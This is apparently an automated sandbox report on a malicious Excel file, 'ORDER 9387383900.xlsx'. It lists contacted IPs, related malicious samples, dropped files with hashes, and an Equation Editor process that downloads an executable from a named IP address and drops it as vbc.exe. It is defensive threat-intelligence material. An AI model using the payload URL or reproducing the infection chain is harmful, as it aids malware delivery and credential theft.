                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                198.23.213.61
                                unknownUnited States
                                36352AS-COLOCROSSINGUStrue
                                208.91.199.225
                                us2.smtp.mailhostbox.comUnited States
                                394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                General Information

                                Joe Sandbox Version:31.0.0 Emerald
                                Analysis ID:385366
                                Start date:12.04.2021
                                Start time:11:33:40
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 6m 55s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:ORDER 9387383900.xlsx
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.expl.evad.winXLSX@6/10@1/2
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 2.1% (good quality ratio 1.3%)
                                • Quality average: 42%
                                • Quality standard deviation: 38.3%
                                HCA Information:
                                • Successful, ratio: 96%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .xlsx
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • TCP Packets have been reduced to 100
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtCreateFile calls found.
                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                11:34:56API Interceptor81x Sleep call for process: EQNEDT32.EXE modified
                                11:34:59API Interceptor829x Sleep call for process: vbc.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                198.23.213.61PO PR 111500976.xlsxGet hashmaliciousBrowse
                                • 198.23.213.61/ooo.exe
                                208.91.199.225usd 420232.exeGet hashmaliciousBrowse
                                  P037725600.exeGet hashmaliciousBrowse
                                    VAT INVOICE.exeGet hashmaliciousBrowse
                                      New Order PO#121012020_____PDF_______.exeGet hashmaliciousBrowse
                                        swift Copy.xls.exeGet hashmaliciousBrowse
                                          AD1-2001028L.exeGet hashmaliciousBrowse
                                            AD1-2001028L (2).exeGet hashmaliciousBrowse
                                              #U7f8e#U91d1#U532f#U738728.84 (USD 40,257+5% #U7a05.exeGet hashmaliciousBrowse
                                                balance payment.exeGet hashmaliciousBrowse
                                                  Image0001.exeGet hashmaliciousBrowse
                                                    money.exeGet hashmaliciousBrowse
                                                      new order.docGet hashmaliciousBrowse
                                                        New Enquiry.MORROCCO.exeGet hashmaliciousBrowse
                                                          Purchase Order #07916813.exeGet hashmaliciousBrowse
                                                            QUOTATION 03-28-2021.exeGet hashmaliciousBrowse
                                                              PURCHASE ORDER COPY.exeGet hashmaliciousBrowse
                                                                credit notification.exeGet hashmaliciousBrowse
                                                                  PURCHASE ORDER COPY.exeGet hashmaliciousBrowse
                                                                    Ref_0866_0817.docGet hashmaliciousBrowse
                                                                      378753687654345678345602.exeGet hashmaliciousBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        us2.smtp.mailhostbox.comPayment Advice Note from 02.04.2021 to 608761.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.223
                                                                        e0xd7qhFaMk3Dpx.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        PAGO FACTURA V-8680.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        usd 420232.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.225
                                                                        P037725600.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.225
                                                                        VAT INVOICE.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        VAT INVOICE.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.225
                                                                        NEW ORDER.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        TRANSFERENCIA AL EXTERIOR U810295.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        PAYMENT SWIFT COPY MT103.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        UPDATED SOA.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        BANK PAYMENT.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        VAT INVOICE.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        IMG_00000000001.PDF.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        New Order PO#121012020_____PDF_______.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        swift Copy.xls.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.225
                                                                        FN vw Safety 1 & 2.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.223
                                                                        MV TBN.uslfze.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        purchase order.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.223
                                                                        AD1-2001028L.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.225

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        PUBLIC-DOMAIN-REGISTRYUSPayment Advice Note from 02.04.2021 to 608761.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.223
                                                                        Dubai REGA 2021UAE.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.135
                                                                        e0xd7qhFaMk3Dpx.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        Dridex.xlsGet hashmaliciousBrowse
                                                                        • 208.91.199.159
                                                                        documents-351331057.xlsmGet hashmaliciousBrowse
                                                                        • 162.251.80.27
                                                                        documents-351331057.xlsmGet hashmaliciousBrowse
                                                                        • 162.251.80.27
                                                                        DUBAI UAEGH092021.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.135
                                                                        PAGO FACTURA V-8680.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        documents-1819557117.xlsmGet hashmaliciousBrowse
                                                                        • 162.251.80.27
                                                                        documents-1819557117.xlsmGet hashmaliciousBrowse
                                                                        • 162.251.80.27
                                                                        usd 420232.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.225
                                                                        P037725600.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.225
                                                                        VAT INVOICE.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        VAT INVOICE.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        NEW ORDER.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        TRANSFERENCIA AL EXTERIOR U810295.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        PAYMENT SWIFT COPY MT103.exeGet hashmaliciousBrowse
                                                                        • 208.91.198.143
                                                                        UPDATED SOA.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        BANK PAYMENT.exeGet hashmaliciousBrowse
                                                                        • 208.91.199.224
                                                                        document-1245492889.xlsGet hashmaliciousBrowse
                                                                        • 5.100.155.169
                                                                        AS-COLOCROSSINGUS12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                                                        • 198.46.204.38
                                                                        intercom.exeGet hashmaliciousBrowse
                                                                        • 192.3.26.107
                                                                        SecuriteInfo.com.Trojan.PWS.Stealer.30255.24265.exeGet hashmaliciousBrowse
                                                                        • 192.210.198.12
                                                                        SecuriteInfo.com.W32.AIDetect.malware1.12135.exeGet hashmaliciousBrowse
                                                                        • 192.210.198.12
                                                                        Payment INVOICE4552U224Y.docxGet hashmaliciousBrowse
                                                                        • 107.173.219.80
                                                                        Payment INVOICE4552U224Y.docxGet hashmaliciousBrowse
                                                                        • 107.173.219.80
                                                                        doc_details.exeGet hashmaliciousBrowse
                                                                        • 192.3.190.242
                                                                        payment copy 090054.xlsxGet hashmaliciousBrowse
                                                                        • 198.23.207.121
                                                                        DHL Shipping doc & Shipment tracking details.docxGet hashmaliciousBrowse
                                                                        • 23.95.122.24
                                                                        dot.dotGet hashmaliciousBrowse
                                                                        • 23.95.122.24
                                                                        New Order for April#89032.xlsxGet hashmaliciousBrowse
                                                                        • 198.23.174.104
                                                                        PO PR 111500976.xlsxGet hashmaliciousBrowse
                                                                        • 198.23.213.61
                                                                        Revised Proforma.xlsxGet hashmaliciousBrowse
                                                                        • 198.23.207.115
                                                                        7yTix20XaT.rtfGet hashmaliciousBrowse
                                                                        • 198.23.251.121
                                                                        Inquiry.docxGet hashmaliciousBrowse
                                                                        • 198.23.251.121
                                                                        order1562.docxGet hashmaliciousBrowse
                                                                        • 198.23.251.121
                                                                        order1562.docxGet hashmaliciousBrowse
                                                                        • 198.23.251.121
                                                                        lF5VYmf6Tm.exeGet hashmaliciousBrowse
                                                                        • 192.3.26.107
                                                                        P.O_RFQ0098765434.xlsxGet hashmaliciousBrowse
                                                                        • 198.46.132.132
                                                                        Payment Proof.xlsxGet hashmaliciousBrowse
                                                                        • 198.23.174.104

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe
                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:downloaded
                                                                        Size (bytes):908288
                                                                        Entropy (8bit):7.684156698361381
                                                                        Encrypted:false
                                                                        SSDEEP:24576:4FRSVYNp2zQ7GGGaw7nJm7vooyqXRiuDWYTf:4HlNEUdGZ7nCgvK3DW
                                                                        MD5:ABEB7AA739C4F99C996B91E51A1FA885
                                                                        SHA1:A0DBD11A666DBA40556F7131D5845A061769A62F
                                                                        SHA-256:428039D6537A6684C3825BC678F9939754A71E346A8BF5D50B9DABFDCE19ACFF
                                                                        SHA-512:0CA016AF9A1CDB7D1395AAD1503EF3C3FA9560BE948B4F698C428E88A475494F0BF79B31A9D17606B9CA84EB3EC7E9E22B3CB06F666C681AD9ABA948F2AE2A63
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Reputation:low
                                                                        IE Cache URL:http://198.23.213.61/rrr.exe
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t`..............P.................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........................................................................0..#.......+.&...(....(..........(.....o.....*..................0..#.......+.&..8......8.....+:..ca.+...ja...oXE............'...]....](.....+......&...+..b(......d(.....+...\XE............!...*...9...H...V..._...z..........+.8y.......8p.....j(.....8b.......8Y.....(.......8J.....(.......8;........&...8-.......8$.....(....+.(....8.......8......(....+..8.......8....*..0..........+.&...+A..qa.+...ja8p.....kY
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3CF4807.png
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:PNG image data, 294 x 262, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):20455
                                                                        Entropy (8bit):7.971919017844605
                                                                        Encrypted:false
                                                                        SSDEEP:384:brrClKSmZ1oI21dlIsZyc++ZeZhJV5nmVOpheJG3u8ItmJIJ:rClKSmZ1oIFcheZhJV5nrS+urmSJ
                                                                        MD5:4BE445245B4530E9136AA45ECC8D18FB
                                                                        SHA1:83810AE3E998B2EDD2FCB72A19E558D7D8E334B4
                                                                        SHA-256:5521F2BF794D82C2C2638841118176A4D1924F049A1F545E1C4E85F375021783
                                                                        SHA-512:E836B244C884854650388635289C62C490A6DC8585CD7DAAC649D9AB5339CD9A5C419DC7ED4778B6AF77904F3BAA976DBC447F8EE503DEC45DC293FFB23E5B20
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: .PNG........IHDR...&..........h8.....pHYs..........(J... .IDATx..w.]U..?k.....K.....HHB .`.B.......{.^.\.~.+...H....J..Z*.L2}..){.....9s..A....<O......Z..[m/.9s4....E.#.....`8..Ig|G.X..wo6........!z...!L...R.....M......F)...CJ.K.|=/.R.8.RJ...Y....#.....`0.S.!..bl..g.y.g.y....e..J.SZ.R..L&.....,.g...e.`0.....S^^.i.2e...z+.......8..).TJ).,X...q..!.i.......5Zkf..-[......c.H&....3w...E}.......%.:SJ.0w.\.{.1.....\IJO.Hux..a.....##J...$SW....8.p8....<&.5.eu.(.........'.....q.%..K.....n...d.%..p.x7}yWa2.....F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45AE4F8B.png
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:PNG image data, 294 x 262, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):20455
                                                                        Entropy (8bit):7.971919017844605
                                                                        Encrypted:false
                                                                        SSDEEP:384:brrClKSmZ1oI21dlIsZyc++ZeZhJV5nmVOpheJG3u8ItmJIJ:rClKSmZ1oIFcheZhJV5nrS+urmSJ
                                                                        MD5:4BE445245B4530E9136AA45ECC8D18FB
                                                                        SHA1:83810AE3E998B2EDD2FCB72A19E558D7D8E334B4
                                                                        SHA-256:5521F2BF794D82C2C2638841118176A4D1924F049A1F545E1C4E85F375021783
                                                                        SHA-512:E836B244C884854650388635289C62C490A6DC8585CD7DAAC649D9AB5339CD9A5C419DC7ED4778B6AF77904F3BAA976DBC447F8EE503DEC45DC293FFB23E5B20
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: .PNG........IHDR...&..........h8.....pHYs..........(J... .IDATx..w.]U..?k.....K.....HHB .`.B.......{.^.\.~.+...H....J..Z*.L2}..){.....9s..A....<O......Z..[m/.9s4....E.#.....`8..Ig|G.X..wo6........!z...!L...R.....M......F)...CJ.K.|=/.R.8.RJ...Y....#.....`0.S.!..bl..g.y.g.y....e..J.SZ.R..L&.....,.g...e.`0.....S^^.i.2e...z+.......8..).TJ).,X...q..!.i.......5Zkf..-[......c.H&....3w...E}.......%.:SJ.0w.\.{.1.....\IJO.Hux..a.....##J...$SW....8.p8....<&.5.eu.(.........'.....q.%..K.....n...d.%..p.x7}yWa2.....F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.F...C.a..`0d.
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C9F6B5.emf
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                        Category:dropped
                                                                        Size (bytes):1316
                                                                        Entropy (8bit):3.231952653147437
                                                                        Encrypted:false
                                                                        SSDEEP:24:YCoj/Bu99E/B08nV3DaBIyEvkxglYGPnSZcRO2:qbXVYI7vkO1SN2
                                                                        MD5:4FA847E6C8056B31A5F0F4B7C3D9CCF6
                                                                        SHA1:597549E70D2C312DD28DAC68E8E6BC4AF7ACCCE2
                                                                        SHA-256:ACAF685D01DFC758C527F08DAD673786202110469428637D26A53FA964FBEF95
                                                                        SHA-512:168111BCAE03070B06917A8CF789727146DB82ECFA076794F4609F04B1844790CFA1B4F64AD79E1BDA8937705051CB9DBD3DE09689C4FF7796BE8EA33D0E54FC
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: ....l............................I..n... EMF....$.......................V...........................fZ..U"..F...4...&...GDIC.........^T...............................................................................-.........!..................................................................................@..Calibri..1.L....p....Iww@.zw..f.....-.................2.................Label1................'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?....................................................................................................R...p................................@..C.a.l.i.b.r.i.................................................................zw........................0...............<....e]w......Yw5..[....pe]w.e]w.....Z...... ........?...?..................<........... ...<....]]w.]]w...,.....L......8...............
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C21E6C10.jpeg
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                        Category:dropped
                                                                        Size (bytes):48770
                                                                        Entropy (8bit):7.801842363879827
                                                                        Encrypted:false
                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D0E8725C.jpeg
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                        Category:dropped
                                                                        Size (bytes):48770
                                                                        Entropy (8bit):7.801842363879827
                                                                        Encrypted:false
                                                                        SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                        MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                        SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                        SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                        SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3AA532.emf
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                        Category:dropped
                                                                        Size (bytes):663104
                                                                        Entropy (8bit):2.965273617796436
                                                                        Encrypted:false
                                                                        SSDEEP:3072:Y34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSy7u50yknG/qc+B:i4UcLe0JOqQQZR8MDdATCR3tSRjqcy
                                                                        MD5:C4321C85D61A995BB80A5ECD394CC221
                                                                        SHA1:F361F7AFAB356415EC6655DC637553BE174567F7
                                                                        SHA-256:C22EED7CE47FE475B4765D04D44DC31A54D70ECDEBF42683F24AFED854A9C51E
                                                                        SHA-512:7DA08D9223B8D193BE36BF98A7E1DD6088D20BAC2A723746531560D8D4B28844EA168696BBFA156FEA64088665DD8EE2902AF74A365D6231B05C02A92DE144E0
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: ....l............................h...>.. EMF....@...................................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...........R...p................................@..C.a.m.b.r.i.a. .M.a.t.h............................................. ................N.[....|...........h....N.[....|... ....y\V|....... ............z\V............................................X..."...A.................... .B................C.a.m.b.r.i... .M.a.t.h...${.....B}......2UV.................{SV............dv......%...........%...........%...........R...p................................@..C.a.m.b.r.i.a. .M.a.t.h...........................................................RV"...p.Aw\...b.\V.@}.".......|0....\V ....y\V...... ........0...z\V...............................2".........d....."...A...........p0..|0... .B................
                                                                        C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):241332
                                                                        Entropy (8bit):4.206799202337516
                                                                        Encrypted:false
                                                                        SSDEEP:1536:cG1LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cANNSk8DtKBrpb2vxrOpprf/nVq
                                                                        MD5:4F3F9FDF02EDABE0217F80DAEB24F300
                                                                        SHA1:3AE00A6FE91DA38202C32F516E63D27F7B48F032
                                                                        SHA-256:96875F8F702463D54345CCC3AE6442E40DB78C03A9B504F45CB9F3A59713FD35
                                                                        SHA-512:BD87065CA3E942EC45FDE91796EE394D45E288E53210B1B39E2DDBA66D2B0BD3C1E5B36C95864EA386447AD3BF0109E550091E66A49ED12A2180B12C4E99287B
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                        C:\Users\user\Desktop\~$ORDER 9387383900.xlsx
                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):330
                                                                        Entropy (8bit):1.4377382811115937
                                                                        Encrypted:false
                                                                        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                        MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                        C:\Users\Public\vbc.exe
                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):908288
                                                                        Entropy (8bit):7.684156698361381
                                                                        Encrypted:false
                                                                        SSDEEP:24576:4FRSVYNp2zQ7GGGaw7nJm7vooyqXRiuDWYTf:4HlNEUdGZ7nCgvK3DW
                                                                        MD5:ABEB7AA739C4F99C996B91E51A1FA885
                                                                        SHA1:A0DBD11A666DBA40556F7131D5845A061769A62F
                                                                        SHA-256:428039D6537A6684C3825BC678F9939754A71E346A8BF5D50B9DABFDCE19ACFF
                                                                        SHA-512:0CA016AF9A1CDB7D1395AAD1503EF3C3FA9560BE948B4F698C428E88A475494F0BF79B31A9D17606B9CA84EB3EC7E9E22B3CB06F666C681AD9ABA948F2AE2A63
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t`..............P.................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........................................................................0..#.......+.&...(....(..........(.....o.....*..................0..#.......+.&..8......8.....+:..ca.+...ja...oXE............'...]....](.....+......&...+..b(......d(.....+...\XE............!...*...9...H...V..._...z..........+.8y.......8p.....j(.....8b.......8Y.....(.......8J.....(.......8;........&...8-.......8$.....(....+.(....8.......8......(....+..8.......8....*..0..........+.&...+A..qa.+...ja8p.....kY

                                                                        Static File Info

                                                                        General

                                                                        File type:CDFV2 Encrypted
                                                                        Entropy (8bit):7.987533610374864
                                                                        TrID:
                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                        File name:ORDER 9387383900.xlsx
                                                                        File size:379392
                                                                        MD5:6cd928e3be0956061f518082a5acb60b
                                                                        SHA1:0e377a42bd4197fceb15e458ccfb46445e7f0132
                                                                        SHA256:19a975e2303b2394ab8ec3550799702b6a6a1eb166c588e90619e2c117baf73f
                                                                        SHA512:d9654dedf72542e326a20c0d151111b5b80929ca7c447071897046ffb24c00d1601ad790c8abcc3893ed75f99415359e0b98c431f2ea3450888c9dd66b2fca24
                                                                        SSDEEP:6144:RyT0CRmNtvySlIWXP5qVwqNglfqmzs1bZNgWWYnJapvfVRLNlbXdxWruoV60Adm/:4z4tqSCWKbGSvFPWYJmFVNl5xWJU0Em/
                                                                        File Content Preview:........................>.......................................................................|..............................................................................................................................................................

                                                                        File Icon

                                                                        Icon Hash:e4e2aa8aa4b4bcb4

                                                                        Static OLE Info

                                                                        General

                                                                        Document Type:OLE
                                                                        Number of OLE Files:1

                                                                        OLE File "ORDER 9387383900.xlsx"

                                                                        Indicators

                                                                        Has Summary Info:False
                                                                        Application Name:unknown
                                                                        Encrypted Document:True
                                                                        Contains Word Document Stream:False
                                                                        Contains Workbook/Book Stream:False
                                                                        Contains PowerPoint Document Stream:False
                                                                        Contains Visio Document Stream:False
                                                                        Contains ObjectPool Stream:
